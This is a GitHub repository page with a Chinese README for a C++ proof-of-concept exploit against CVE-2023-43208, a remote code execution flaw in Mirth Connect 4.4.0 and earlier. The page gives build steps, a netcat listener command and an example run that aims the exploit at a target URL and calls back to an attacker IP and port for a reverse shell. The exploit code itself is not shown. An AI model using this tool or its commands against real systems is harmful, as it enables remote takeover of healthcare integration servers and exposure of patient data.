Pegasus0xx/CVE-2023-43208

GitHub: Pegasus0xx/CVE-2023-43208

针对 Mirth Connect 4.4.0 及以下版本 XStream 反序列化漏洞的 C++ 语言 RCE 利用工具。

Stars: 1 | Forks: 0

# Mirth Connect RCE - CVE-2023-43208 ## 描述 Mirth Connect 远程代码执行 (RCE) PoC 通过 XStream 反序列化影响 Mirth Connect <= 4.4.0。 ## 环境要求 - g++ (C++20) ## 安装 ``` git clone https://github.com/Pegasus0xx/CVE-2023-43208.git && \ cd CVE-2023-43208 && \ make ``` ## 用法 ``` ./exploit ``` ## 示例 ### 启动监听器 ``` nc -lvnp 4444 ``` ### 运行漏洞利用程序 ``` ./exploit https://target.com 10.10.10.10 4444 ``` ## 参考资料 - https://nvd.nist.gov/vuln/detail/CVE-2023-43208 - https://github.com/advisories/GHSA-pj5c-qr29-6746
标签:C++20, CISA项目, CVE-2023-43208, Maven, Mirth Connect, NextGen Connect, PoC, RCE, Web报告查看器, XStream 反序列化, 医疗信息系统, 攻击脚本, 暴力破解, 漏洞验证, 编程工具, 网络安全, 远程代码执行, 隐私保护